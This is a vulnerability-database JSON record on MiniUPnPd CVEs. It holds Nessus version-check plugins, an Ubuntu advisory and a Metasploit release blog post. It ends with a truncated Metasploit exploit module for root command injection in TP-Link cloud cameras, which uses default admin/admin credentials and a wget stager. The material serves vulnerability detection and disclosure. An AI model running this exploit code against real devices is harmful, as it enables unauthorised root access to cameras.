{"nessus": [{"lastseen": "2020-11-25T15:14:32", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe USN-4542-1 advisory.\n\n - The upnp_event_prepare function in upnpevents.c in MiniUPnP MiniUPnPd through 2.1 allows a remote attacker\n to leak information from the heap due to improper validation of an snprintf return value. (CVE-2019-12107)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in GetOutboundPinholeTimeout in upnpsoap.c for int_port. (CVE-2019-12108)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in GetOutboundPinholeTimeout in upnpsoap.c for rem_port. (CVE-2019-12109)\n\n - An AddPortMapping Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL\n pointer dereference in upnpredirect.c. (CVE-2019-12110)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in copyIPv6IfDifferent in pcpserver.c. 
(CVE-2019-12111)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2020-09-26T00:00:00", "title": "Ubuntu 16.04 LTS : MiniUPnPd vulnerabilities (USN-4542-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "modified": "2020-09-26T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:miniupnpd", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts"], "id": "UBUNTU_USN-4542-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140802", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4542-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140802);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\n \"CVE-2019-12107\",\n \"CVE-2019-12108\",\n \"CVE-2019-12109\",\n \"CVE-2019-12110\",\n \"CVE-2019-12111\"\n );\n script_xref(name:\"USN\", value:\"4542-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : MiniUPnPd vulnerabilities (USN-4542-1)\");\n script_summary(english:\"Checks the dpkg output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe USN-4542-1 advisory.\n\n - The upnp_event_prepare function in upnpevents.c in MiniUPnP MiniUPnPd through 2.1 allows a 
remote attacker\n to leak information from the heap due to improper validation of an snprintf return value. (CVE-2019-12107)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in GetOutboundPinholeTimeout in upnpsoap.c for int_port. (CVE-2019-12108)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in GetOutboundPinholeTimeout in upnpsoap.c for rem_port. (CVE-2019-12109)\n\n - An AddPortMapping Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL\n pointer dereference in upnpredirect.c. (CVE-2019-12110)\n\n - A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer\n dereference in copyIPv6IfDifferent in pcpserver.c. (CVE-2019-12111)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4542-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected miniupnpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12107\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:miniupnpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + release);\nif ( ! 
get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'miniupnpd', 'pkgver': '1.8.20140523-4.1+deb9u2build0.16.04.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'miniupnpd');\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T02:20:13", "description": "Security patches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-10-07T00:00:00", "title": "Fedora 31 : miniupnpd (2019-0a26e06dd5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:miniupnpd", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2019-0A26E06DD5.NASL", 
"href": "https://www.tenable.com/plugins/nessus/129600", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-0a26e06dd5.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129600);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/12/23\");\n\n script_cve_id(\"CVE-2019-12107\", \"CVE-2019-12108\", \"CVE-2019-12109\", \"CVE-2019-12110\", \"CVE-2019-12111\");\n script_xref(name:\"FEDORA\", value:\"2019-0a26e06dd5\");\n\n script_name(english:\"Fedora 31 : miniupnpd (2019-0a26e06dd5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security patches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-0a26e06dd5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected miniupnpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:miniupnpd\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"miniupnpd-2.1-7.fc31\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"miniupnpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:40:49", "description": "Ben Barnea and colleagues from VDOO discovered several vulnerabilities\nin miniupnpd, a small daemon that provides UPnP Internet Gateway\nDevice and Port Mapping Protocol services. The issues are basically\ninformation leak, NULL pointer dereferences and uses after free.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1.8.20140523-4+deb8u1.\n\nWe recommend that you upgrade your miniupnpd packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 16, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-05-31T00:00:00", "title": "Debian DLA-1811-1 : miniupnpd security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2017-1000494", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "modified": "2019-05-31T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:miniupnpd", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1811.NASL", "href": "https://www.tenable.com/plugins/nessus/125607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1811-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125607);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000494\", \"CVE-2019-12107\", \"CVE-2019-12108\", \"CVE-2019-12109\", \"CVE-2019-12110\", \"CVE-2019-12111\");\n\n script_name(english:\"Debian DLA-1811-1 : miniupnpd security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Barnea and colleagues from VDOO discovered several vulnerabilities\nin miniupnpd, a small daemon that provides UPnP Internet Gateway\nDevice and Port Mapping Protocol services. 
The issues are basically\ninformation leak, NULL pointer dereferences and uses after free.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1.8.20140523-4+deb8u1.\n\nWe recommend that you upgrade your miniupnpd packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00045.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/miniupnpd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected miniupnpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12107\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:miniupnpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 
Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"miniupnpd\", reference:\"1.8.20140523-4+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "rapid7blog": [{"lastseen": "2020-09-29T20:39:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353", "CVE-2018-18556", "CVE-2020-1048", "CVE-2020-12109", "CVE-2020-1472", "CVE-2020-17506"], "description": "\n\nNine! Nine new modules! (Ah ha ha!)\n\nWith the coming of autumn here in the Northern hemisphere, the nights are getting longer, and the hacking is getting stronger. We\u2019ve really got something for everybody in this release, from IoT to infrastructure, Windows, and Linux; everyone\u2019s pretty well-represented!\n\nWindows has been patching several vulnerabilities lately, and we have modules for them! 
Metasploit\u2019s own [Spencer](<https://github.com/ZeroSteiner>) and [Brendan](<https://github.com/bwatters-r7>) have been working on bringing in work from others; Spencer wrote a Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?#rapid7-analysis>)) module based on the work by Tom Tervoort, and Brendan wrote a module covering the PrinterDemon vulnerability ([CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=wrap-up>)) building on the work of Alex Ionescu and [shubham0d](<https://github.com/shubham0d>).\n\nSpencer also added a new SOCKS module to unite the tribes of proxies currently in Metasploit, with one module to rule them all, and in the darkness, bind them!\n\nNot to be outdone, our own [Shelby](<https://github.com/space-r7>) added to the module count with [CVE-2017-1000353](<https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353?referrer=wrap-up>) and YAJDV (Yet another Java Deserialization Vulnerability) against everyone\u2019s favorite devops tool, Jenkins. Now you can ask Jenkins to test your code _or_ run it! While this vulnerability may be a bit older, we all know people miss patches, so it is worth checking out.\n\nRounding out the Metasploit team\u2019s contributions are [Grant](<https://github.com/gwillcox-r7>) and a new module to gather information on installed software on targets, and when we say targets, we mean it: Windows, Linux, Android, and Mac are all covered by this new gather module!\n\nAs if the Metasploit team\u2019s contributions were not enough, we had some seriously high-quality work come in from our community members as well! 
Auth bypasses for Artica Proxy by [Niboucha Redouane](<https://github.com/red0xff>), Cloud Camera command injection by Pietro Oliva, VyOS escape by Rich Mirch and [bcoles](<https://github.com/bcoles>), and a SecureCRT password decryptor by cn-kali-team.\n\n## New modules (9)\n\n * [Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14025>) by Max0x4141 and Redouane NIBOUCHA, which exploits [CVE-2020-17506](<https://attackerkb.com/topics/TIR8HEspsz/cve-2020-17506?referrer=blog>)\n * [Jenkins CLI Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14122>) by SSD, Shelby Pace, and Unknown, which exploits [CVE-2017-1000353](<https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353?referrer=blog>)\n * [TP-Link Cloud Cameras NCXXX Bonjour Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14135>) by Pietro Oliva, which exploits [CVE-2020-12109](<https://attackerkb.com/topics/TTBzMpfHr2/cve-2020-12109?referrer=blog>)\n * [VyOS restricted-shell Escape and Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/14123>) by Rich Mirch and bcoles, which exploits [CVE-2018-18556](<https://attackerkb.com/topics/75ZrO8GTzs/cve-2018-18556?referrer=blog>)\n * [Microsoft Spooler Local Privilege Elevation Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14023>) by Alex Ionescu, Yarden Shafir, bwatters-r7, and shubham0d, which exploits [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>)\n * [Netlogon Weak Cryptographic Authentication](<https://github.com/rapid7/metasploit-framework/pull/14151>) by Dirk-jan Mollema, Spencer McIntyre, and Tom Tervoort, which exploits [CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=blog>)\n * [SOCKS Proxy 
Server](<https://github.com/rapid7/metasploit-framework/pull/14173>) by Spencer McIntyre, sf, and surefire\n * [Multiplatform Installed Software Version Enumerator](<https://github.com/rapid7/metasploit-framework/pull/14140>) by gwillcox-r7\n * [Windows SecureCRT Session Information Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14118>) by HyperSine and Kali-Team\n\n## Bugs fixed\n\n * [Show correct rank for show exploits command](<https://github.com/rapid7/metasploit-framework/pull/14176>) from [Alan David Foster](<https://github.com/adfoster-r7>) fixes a bug where the ranking for exploits was not shown properly when the `show exploits` command was used.\n * [Always display `SRVHOST` and `SRVPORT` options when `CMDSTAGER::FLAVOR` is set to `auto`](<https://github.com/rapid7/metasploit-framework/pull/14153>) from [Christophe](<https://github.com/cdelafuente-r7>) fixes a bug where the SRVPORT and SRVHOST parameters are not displayed properly if the command stager flavor is set to `auto`\n * [Fix is_known_pipename module](<https://github.com/rapid7/metasploit-framework/pull/14035>) also from Christophe fixes an issue in the is_known_pipename exploit module which targets samba. There was an incorrect SMB version 1 data structure definition that was causing the module to fail to verify a writeable directory.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog \npost from GitHub:\n\n * [Pull Requests 6.0.7...6.0.8](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-09-17T11%3A03%3A21-05%3A00..2020-09-24T11%3A12%3A08-05%3A00%22>)\n * [Full diff 6.0.7...6.0.8](<https://github.com/rapid7/metasploit-framework/compare/6.0.7...6.0.8>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>)(master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-09-25T18:54:14", "published": "2020-09-25T18:54:14", "id": "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "href": "https://blog.rapid7.com/2020/09/25/metasploit-wrap-up-80/", "type": "rapid7blog", "title": "Metasploit Wrap-up", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-09-25T21:08:01", "bulletinFamily": "unix", "cvelist": ["CVE-2019-12107", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "description": "It was discovered that MiniUPnPd did not properly validate callback \naddresses. A remote attacker could possibly use this issue to expose \nsensitive information. (CVE-2019-12107)\n\nIt was discovered that MiniUPnPd incorrectly handled unpopulated user XML \ninput. An attacker could possibly use this issue to cause MiniUPnPd to \ncrash, resulting in a denial of service. (CVE-2019-12108, CVE-2019-12109)\n\nIt was discovered that MiniUPnPd incorrectly handled an empty description \nwhen port mapping. An attacker could possibly use this issue to cause \nMiniUPnPd to crash, resulting in a denial of service. (CVE-2019-12110)\n\nIt was discovered that MiniUPnPd did not properly parse certain PCP \nrequests. An attacker could possibly use this issue to cause MiniUPnPd to \ncrash, resulting in a denial of service. 
(CVE-2019-12111)", "edition": 1, "modified": "2020-09-25T00:00:00", "published": "2020-09-25T00:00:00", "id": "USN-4542-1", "href": "https://ubuntu.com/security/notices/USN-4542-1", "title": "MiniUPnPd vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-09-18T17:24:59", "description": "", "published": "2020-09-18T00:00:00", "type": "packetstorm", "title": "TP-Link Cloud Cameras NCXXX Bonjour Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-12109", "CVE-2020-12110"], "modified": "2020-09-18T00:00:00", "id": "PACKETSTORM:159222", "href": "https://packetstormsecurity.com/files/159222/TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'TP-Link Cloud Cameras NCXXX Bonjour Command Injection', \n'Description' => %q{ \nTP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, \nNC250, NC260, NC450) are vulnerable to an authenticated command \ninjection. In all devices except NC210, despite a check on the name length in \nswSystemSetProductAliasCheck, no other checks are in place in order \nto prevent shell metacharacters from being introduced. The system name \nwould then be used in swBonjourStartHTTP as part of a shell command \nwhere arbitrary commands could be injected and executed as root. NC210 devices \ncannot be exploited directly via /setsysname.cgi due to proper input \nvalidation. NC210 devices are still vulnerable since swBonjourStartHTTP \ndid not perform any validation when reading the alias name from the \nconfiguration file. 
The configuration file can be written, and code \nexecution can be achieved by combining this issue with CVE-2020-12110. \n}, \n'Author' => ['Pietro Oliva <pietroliva[at]gmail.com>'], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109' ], \n[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ], \n[ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ], \n[ 'CVE', '2020-12109'] \n], \n'DisclosureDate' => '2020-04-29', \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSLE, \n'Targets' => \n[ \n[ \n'TP-Link NC200, NC220, NC230, NC250', \n{ \n'Arch' => ARCH_MIPSLE, \n'Platform' => 'linux', \n'CmdStagerFlavor' => [ 'wget' ] \n} \n], \n[ \n'TP-Link NC260, NC450', \n{ \n'Arch' => ARCH_MIPSLE, \n'Platform' => 'linux', \n'CmdStagerFlavor' => [ 'wget' ], \n'DefaultOptions' => { 'SSL' => true } \n} \n] \n], \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]), \nOptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]) \n] \n) \nend \n \ndef login \nuser = datastore['USERNAME'] \npass = Base64.strict_encode64(datastore['PASSWORD']) \nif target.name == 'TP-Link NC260, NC450' \npass = Rex::Text.md5(pass) \nend \n \nprint_status(\"Authenticating with #{user}:#{pass} ...\") \nbegin \nres = send_request_cgi({ \n'uri' => '/login.fcgi', \n'method' => 'POST', \n'vars_post' => { \n'Username' => user, \n'Password' => pass \n} \n}) \nif res.nil? || res.code == 404 \nfail_with(Failure::NoAccess, '/login.fcgi did not reply correctly. 
